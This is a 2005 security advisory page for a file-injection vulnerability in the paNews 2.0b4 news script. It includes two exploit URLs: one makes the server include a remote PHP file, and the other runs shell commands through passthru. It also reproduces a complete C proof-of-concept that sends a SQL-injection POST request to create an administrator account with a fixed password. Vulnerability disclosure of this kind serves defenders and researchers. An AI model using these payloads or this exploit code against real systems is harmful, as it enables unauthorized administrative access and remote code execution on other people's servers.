Security News -  Security Reviews -   Exploits -  Tools -  UNIX Focus -  Windows Focus
Home  Ask the Team  Mailing Lists  Advertising Info  Advisories  About SecuriTeam  Blogs Brought to you by: Suppliers of: Website Testing Tools Network Testing Tools Software Testing Tools SecuriTeam in Your Inbox New vulnerability? New tool? Tell us (Our PGP key). Confidence 2013 5% Off any SANS course Use Code: SecuriTeam_5 Hack In Paris La Nuit du Hack Subjects of Interest: Vulnerability Management SQL Injection Buffer Overflows Active Network Scanning Fuzzing Fuzzer Report Network Security Network Scanner Pen Testing Security Scanner	File Injection in paNews 9 Mar. 2005    Summary "paNews is a news management script to use on your site. Users can use paCode, special code designed to allow the adding of images and font changes in the posts without allowing users to use HTML to post harmful things such as Java scripts and applets. It has several other features making adding entries and controlling it easily." Vulnerability in administrating code of paNews allows to inject malicious php files to be run on a vulnerable server.   Credit: The information has been provided by tjomka. The original article can be found at: nst.e-nex.com Free Website Security Scan Free Fuzzer Report Vulnerability Assessment Detect web app vulnerabilities University study comparing the top Accurate and automated scanning Get guidance from professionals. 6 commercially availble fuzzers. for networks of any size.    Details Protect your website! Free Trial, Nothing to install. No interruption of visitors. www.beyondsecurity.com/vulnerability-scanner Vulnerable Systems:  * paNews version 2.0b4 PHP file injection works only with following settings: 1. register_globals=On 2. folder "includes" is writable Example One: http://victim/panews/includes/admin_setup.php?access[]=admins&do=updatesets&form[comments]=$nst&form[autoapprove]=$nst&disvercheck=$nst&installed=$asd&showcopy=include($nst) Then: http://victim/panews/includes/config.php?nst=http://your/file.php Example Two: http://victim/panews/includes/admin_setup.php?access[]=admins&do=updatesets&form[comments]=$nst&form[autoapprove]=$nst&disvercheck=$nst&installed=$asd&showcopy=passthru($nst) Then: http://victim/panews/includes/config.php?nst=id Proof of Concept: Silentium had written another exploit for this vulnerability, The POST + SWL injection to add an admin user on system. /*************************************************** * paNews v2.0b4 * * * * silePNEWSxpl * * This exploit utilize SQL injection for create * * a new user with admin privileges on paNews * * software system. * * References: * * packetstormsecurity.org/0503-exploits/panews.txt * * * * coded by: Silentium of Anacron Group Italy * * date: 04/03/2005 * * e-mail: anacrongroupitaly[at]autistici[dot]org * * my_home: www.autistici.org/anacron-group-italy * * this tool is developed under GPL license * * no(c) .:. copyleft * ***************************************************/ #include <stdio.h> #include <stdlib.h> #include <string.h> #include <sys/types.h> #include <sys/socket.h> #include <netinet/in.h> #include <netdb.h> #define PORT 80 // port of the web server void info(void); void sendxpl(int sock, char *argv[]); void errsock(void); void errgeth(void); void errconn(void); int main(int argc, char *argv[]){ int sock, sockconn; struct sockaddr_in addr; struct hostent *hp; if(argc!=4)    info();     if((sock = socket(AF_INET, SOCK_STREAM, 0)) < 0)    errsock();     system("clear"); printf("[*] Creating socket [OK]\n"); if((hp = gethostbyname(argv[1])) == NULL)    errgeth();     printf("[*] Resolving victim host [OK]\n"); memset(&addr,0,sizeof(addr)); memcpy((char *)&addr.sin_addr,hp->h_addr,hp->h_length); addr.sin_family = AF_INET; addr.sin_port = htons(PORT); sockconn = connect(sock,(struct sockaddr *)&addr,sizeof(addr)); if(sockconn < 0)    errsock();     printf("[*] Connecting at victim host [OK]\n"); sendxpl(sock, argv); printf("[*] Now check on\n"        " http://%s%s\n\n"        " your username: %s\n"        " with password: anacron\n\n",argv[1],argv[2],argv[3]); shutdown(sock, 2); close(sock); return(0); } void info(void){ system("clear"); printf("#########################################\n"        "# paNews v2.0b4 exploit #\n"        "#########################################\n"        "# this exploit create a new user admin #\n"        "# on paNews software system. #\n"        "# exploit coded by Silentium #\n"        "# Anacron Group Italy #\n"        "# www.autistici.org/anacron-group-italy #\n"        "#########################################\n\n"        "[usage]\n\n"        " silePNEWSxpl <victim> <path_paNews> <username>\n\n"        "[example]\n\n"        " silePNEWSxpl www.victim.com /panews/index.php silentium\n\n"); exit(1); } void sendxpl(int sock, char *argv[]){ FILE *out; int size = 264; out = fdopen(sock,"a"); setbuf(out,NULL); size+=(strlen(argv[3]) * 2); fprintf(out,"POST %s HTTP/1.0\n"             "Connection: Keep-Alive\n"             "Pragma: no-cache\n"             "Cache-control: no-cache\n"             "Accept: text/html, image/jpeg, image/png, text/*, image/*, */*\n"             "Accept-Encoding: x-gzip, x-deflate, gzip, deflate, identity\n"             "Accept-Charset: iso-8859-1, utf-8;q=0.5, *;q=0.5\n"             "Accept-Language: en\n"             "Host: %s\n"             "Referer: http://%s%s\n"             "Content-Type: application/x-www-form-urlencoded\n"             "Content-Length: %d\n\n"             "action%%3Dlogin%%26username%%3D%s%%26password%%3Danacron%%26"             "mysql_prefix%%3Dpanews_auth%%60%%20VALUES%%20(%%22%%22,%%22"             "%s%%22,%%22f63140655b379e65f6cd87fa3c3da631%%22,%%22"             "hackit%%22,%%22admins%%7Ccat%%7Ccomment%%7Cnewsadd%%7Cnewsedit"             "%%7Cprefset%%7Csetup%%22,%%22none%%22,%%22127.0.0.1%%22"             ",1,1)%%00\n\n",argv[2],argv[1],argv[1],argv[2],size,argv[3],argv[3]);                          printf("[*] Sending exploit [OK]\n\n");              } void errsock(void){ system("clear"); printf("[x] Creating socket [FAILED]\n\n"); exit(1); } void errgeth(void){ printf("[x] Resolving victim host [FAILED]\n\n"); exit(1); } void errconn(void){ printf("[x] Connecting at victim host [FAILED]\n\n"); exit(1); } //EoF The original code can be found at: http://www.autistici.org/anacron-group-italy/file/source/silePNEWSxpl_v2.0b4.c  Comments: blog comments powered by Disqus	All Sections Security News Unix focus Exploits Tools Windows focus Security Reviews  Related Articles 'ProFTPD Response Pool Use-After-Free Code Execution Vulnerability' 'Insight Control for Linux Multiple Vulnerabilities' 'HP-UX Running NFS/ONCplus Denial of Service Vulnerability' 'HP-UX Running BIND Denial of Service Vulnerability 2011' 'HP-UX Running XNTP Denial of Service Vulnerability' 'HP-UX Denial of Service Vulnerability' 'Webkit Detached Body Element Code Execution Vulnerability' 'Mac OS X Compact Font Format Decoder Code Execution Vulnerability' 'WebKit WBR Tag Removal Code Execution Vulnerability' 'Webkit Undefined DOM Prototype Attach Code Execution Vulnerability' 'Apple HFS Information Disclosure Vulnerability' 'XPDF arbitrary Arbitrary Code Execution Vulnerabilities' 'Hewlett-Packard Data Protector Client EXEC_CMD omni_chk_ds.sh Code Execution Vulnerability' 'Red Hat OpenJDK IcedTea6 ClassLoader Code Execution Vulnerability' 'HP-UX Apache Running Tomcat Servlet Engine Remote Modification and Denial of Service Vulnerabilities' 'Apple Webkit WholeText Integer Overflow Code Execution Vulnerability' 'HP-UX Running OpenSSL Execution of Arbitrary Code and Denial of Service Vulnerabilities' 'HP-UX CIFS Server execution of Arbitrary Code and Denial of Service Vulnerabilities' 'HP-UX Running Threaded Processes Denial of Service Vulnerability' 'HP-UX Apache-based Web Server Multiple Vulnerabilities'  Featured Articles 'Samba 3.3.12 Memory Corruption Vulnerability' 'KDE KGet Insecure File Operation Vulnerability' 'KDE KGet Insecure File Operation Vulnerability' 'KDE KGet Insecure File Operation Vulnerability' 'Ziproxy Multiple Integer Overflow Vulnerabilities' 'Mozilla Bugzilla Multiple Vulnerabilities' 'Apple WebKit CSS Run-in Attribute Rendering Vulnerability' 'Apple Webkit Blink Event Dangling Pointer Remote Code Execution Vulnerability' 'RADactive I-Load Multiple Vulnerabilities' 'Plume CMS Multiple SQL Injection Vulnerabilities' 'HP-UX Running IPFilter Remote Denial of Service' 'Oracle Enterprise Manager SQL Injection Vulnerability' 'Oracle BEA Weblogic Linked XSS vulnerability' 'Joomla! Multiple Full Path Disclosure Vulnerabilities' 'ILIAS LMS Multiple Artibrary Information Disclosure' 'HP-UX Running NFS/ONCplus DoS' 'Sun Solaris Integer Overflow Vulnerability' 'Asterisk Multiple Vulnerabilities' 'MapServer Multiple Vulnerabilities' 'File-Find-Object Format String Vulnerability'
	Security News - Security Reviews - Exploits - Tools - UNIX Focus - Windows Focus - Blogs - CVEs

Copyright © Beyond Security® All rights reserved.
Terms of Use Site Privacy Statement.
SecuriTeam™ is a trademark of Beyond Security®